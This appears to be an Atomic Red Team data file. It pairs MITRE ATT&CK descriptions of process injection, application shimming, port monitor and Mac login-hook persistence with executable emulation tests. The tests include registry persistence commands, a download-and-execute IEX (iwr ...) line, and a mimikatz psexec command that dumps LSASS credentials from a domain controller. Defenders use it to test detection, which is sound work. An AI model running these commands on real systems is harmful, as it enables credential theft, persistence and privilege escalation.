created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/003
external_id: T1055.003
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.433Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
Thread Execution Hijacking is a method of executing arbitrary code in the
address space of a separate live process. \n\nThread Execution Hijacking is
commonly performed by suspending an existing process then unmapping/hollowing
its memory, which can then be replaced with malicious code or the path to
a DLL. A handle to an existing victim process is first created with native
Windows API calls such as OpenThread. At this point the process
can be suspended then written to, realigned to the injected code, and resumed
via SuspendThread , VirtualAllocEx, WriteProcessMemory,
SetThreadContext, then ResumeThread respectively.(Citation:
Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012)
but targets an existing process rather than creating a process in a suspended
state. \n\nRunning code in the context of another process may allow access
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via Thread Execution Hijacking may also evade detection from security
products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
auto_generated_guid: 578025d5-faa9-4f6d-8390-aae527d503e1
description: 'This test injects a MessageBox shellcode generated by msfvenom
in Notepad.exe using Thread Execution Hijacking. When successful, a message
box will appear with the "Atomic Red Team" caption after one or two seconds. '
supported_platforms:
- windows
executor:
command: |-
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"
Start-Sleep -Seconds 5
Stop-Process $notepad.id
name: powershell
T1546.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
created: '2020-01-24T14:56:24.231Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/011
external_id: T1546.011
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: FireEye Application Shimming
description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
May 4, 2020.
url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
- source_name: Black Hat 2015 App Shim
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.703Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
Windows Application Compatibility Infrastructure/Framework (Application Shim)
was created to allow for backward compatibility of software as the operating
system codebase changes over time. For example, the application shimming feature
allows developers to apply fixes to applications (without rewriting code)
that were created for Windows XP so that it will work with Windows 10. (Citation:
Elastic Process Injection July 2017)\n\nWithin the framework, shims are created
to act as a buffer between the program (or more specifically, the Import Address
Table) and the Windows OS. When a program is executed, the shim cache is referenced
to determine if the program requires the use of the shim database (.sdb).
If so, the shim database uses hooking to redirect the code as necessary in
order to communicate with the OS. \n\nA list of all shims currently installed
by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom
databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
install backdoors, disable defenses like Windows Defender, etc. (Citation:
FireEye Application Shimming) Shims can also be abused to establish persistence
by continuously being invoked by affected programs."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18
description: "Install a shim database. This technique is used for privilege
escalation and bypassing user access control.\nUpon execution, \"Installation
of AtomicShim complete.\" will be displayed. To verify the shim behavior,
run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin
directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\"
as defined in the AtomicTest.dll. To better understand what is happening,
review\nthe source code files is the \\\\T1546.011\\\\src
directory.\n"
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the shim database file
type: string
default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb
dependency_executor_name: powershell
dependencies:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
'
prereq_command: 'if (Test-Path "#{file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "#{file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
'
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
'
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe "#{file_path}"
'
cleanup_command: 'sdbinst.exe -u "#{file_path}" >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d
description: |
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb" C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb
Copy-Item "$PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb" C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Registry key creation and/or modification events for SDB
auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f
description: |
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
supported_platforms:
- windows
executor:
command: |
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore
name: powershell
elevation_required: true
T1547.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe
created: '2020-01-24T19:46:27.750Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/010
external_id: T1547.010
- source_name: Bloxham
description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
2024.
url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.872Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
can be set through the AddMonitor API call to set a DLL to be
loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32
and will be loaded and run by the print spooler service, `spoolsv.exe`, under
SYSTEM level permissions on boot.(Citation: Bloxham) \n\nAlternatively, an
arbitrary DLL can be loaded if permissions allow writing a fully-qualified
pathname for that DLL to the `Driver` value of an existing or new arbitrarily
named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
The Registry key contains entries for the following:\n\n* Local Port\n* Standard
TCP/IP Port\n* USB Monitor\n* WSD Port\n"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
- Travis Smith, Tripwire
- Harun Küßner
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50
description: Add key-value pair to a Windows Port Monitor registry. On the subsequent
reboot DLL will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
supported_platforms:
- windows
input_arguments:
monitor_dll:
description: Addition to port monitor registry key. Normally refers to a
DLL name in C:\Windows\System32 but an arbitrary DLL can be specified
with the absolute path.
type: path
default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
executor:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
/v "Driver" /d "#{monitor_dll}" /t REG_SZ /f
'
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
/f >nul 2>&1
'
name: command_prompt
elevation_required: true
T1037.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0
created: '2020-01-10T16:01:15.995Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/002
external_id: T1037.002
- source_name: Login Scripts Apple Dev
description: Apple. (2016, September 13). Customizing Login and Logout. Retrieved
April 1, 2022.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html
- source_name: LoginWindowScripts Apple Dev
description: Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.
url: https://developer.apple.com/documentation/devicemanagement/loginwindowscripts
- source_name: Wardle Persistence Chapter
description: 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved
April 13, 2022.'
url: https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf
- source_name: S1 macOs Persistence
description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved
March 27, 2020.
url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.963Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
description: "Adversaries may use a Login Hook to establish persistence executed
upon user logon. A login hook is a plist file that points to a specific script
to execute with root privileges upon user logon. The plist file is located
in the /Library/Preferences/com.apple.loginwindow.plist file
and can be modified using the defaults command-line utility.
This behavior is the same for logout hooks where a script can be executed
upon user logout. All hooks require administrator permissions to modify or
create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts
Apple Dev) \n\nAdversaries can add or insert a path to a malicious script
in the com.apple.loginwindow.plist file, using the LoginHook
or LogoutHook key-value pair. The malicious script is executed
upon the next user login. If a login hook already exists, adversaries can
add additional commands to an existing login hook. There can be only one login
and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '2.0'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2.
Populate the plist with the location of your shell script\n\n sudo defaults
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3.
Create the required plist file in the target user's Preferences directory\n\n\t
\ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4.
Populate the plist with the location of your shell script\n\n\t defaults
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
name: manual
T1055:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
created: '2017-05-31T21:30:47.843Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055
external_id: T1055
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: ArtOfMemoryForensics
description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: Microsoft Sysmon v6 May 2017
description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved
December 13, 2017.
url: https://docs.microsoft.com/sysinternals/downloads/sysmon
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.053Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
of executing arbitrary code in the address space of a separate live process.
Running code in the context of another process may allow access to the process's
memory, system/network resources, and possibly elevated privileges. Execution
via process injection may also evade detection from security products since
the execution is masked under a legitimate process. \n\nThere are many different
ways to inject code into a process, many of which abuse legitimate functionalities.
These implementations exist for every major OS but are typically platform
specific. \n\nMore sophisticated samples may perform multiple process injections
to segment modules and further evade detection, utilizing named pipes or other
inter-process communication (IPC) mechanisms as a communication channel. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Anastasios Pingios
- Christiaan Beek, @ChristiaanBeek
- Ryan Becwar
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.4'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
supported_platforms:
- windows
input_arguments:
txt_path:
description: Path to file containing VBA macro to run
type: path
default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
dependency_executor_name: powershell
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
'
- description: '"#{txt_path}" must exist on disk at specified location
'
prereq_command: 'if (Test-Path "#{txt_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{txt_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}" -UseBasicParsing
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
description: |
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
Especially useful against domain controllers in Active Directory environments.
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in
supported_platforms:
- windows
input_arguments:
machine:
description: machine to target (via psexec)
type: string
default: DC1
mimikatz_path:
description: Mimikatz windows executable
type: path
default: "%tmp%\\mimikatz\\x64\\mimikatz.exe"
psexec_path:
description: Path to PsExec
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
'
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_path}" -Force
executor:
command: '"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
'
name: command_prompt
elevation_required: false
- name: Section View Injection
auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178
description: "This test creates a section object in the local process followed
by a local section view.\nThe shellcode is copied into the local section view
and a remote section view is created in the target process, pointing to the
local section view. \nA thread is then created in the target process, using
the remote section view as start address.\n"
supported_platforms:
- windows
executor:
command: |
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"
cleanup_command: Stop-Process $notepad.pid
name: powershell
- name: Dirty Vanity process Injection
auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
description: "This test used the Windows undocumented remote-fork API RtlCreateProcessReflection
to create a cloned process of the parent process\nwith shellcode written in
its memory. The shellcode is executed after being forked to the child process.
The technique was first presented at \nBlackHat Europe 2022. Shellcode will
open a messsage box and a notepad.\n"
supported_platforms:
- windows
input_arguments:
pid:
description: Parent process ID
type: string
default: "(Start-Process calc.exe -PassThru).Id"
executor:
command: 'Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe"
#{pid}
'
cleanup_command: Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue
| Stop-Process -Force
name: powershell
elevation_required: false
- name: Read-Write-Execute process Injection
auto_generated_guid: '0128e48e-8c1a-433a-a11a-a5387384f1e1'
description: "This test exploited the vulnerability in legitimate PE formats
where sections have RWX permission and enough space for shellcode.\nThe RWX
injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
thus evading detection mechanisms \nthat relied on API call sequences and
heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
injected shellcode will open a message box and a notepad.\nRWX Process Injection,
also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
supported_platforms:
- windows
input_arguments:
vuln_dll:
description: vulnerable DLL
type: path
default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
dependency_executor_name: powershell
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
'
prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
executor:
command: |
$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
- name: Process Injection with Go using UuidFromStringA WinAPI
auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
memory is allocated on the heap and does not use commonly suspicious APIs
such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
(https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
\n - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
\ - https://twitter.com/_CPResearch_/status/1352310521752662018\n - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Process Injection with Go using EtwpCreateEtwThread WinAPI
auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
within the application's process.\nThis program loads the DLLs and gets a
handle to the used procedures itself instead of using the windows package
directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
macro to copy the shellcode to the allocated memory space\n3. Change the memory
page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
on shellcode address\n5. Call WaitForSingleObject so the program does not
end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
References: \n - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
\ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
description: "Executes shellcode in a remote process.\n\nSteps taken with this
technique\n1. Get a handle to the target process\n2. Allocate memory for the
shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
Use the WriteProcessMemory to copy the shellcode to the allocated memory space
in the remote process\n4. Change the memory page permissions to Execute/Read
with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
References: \n - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
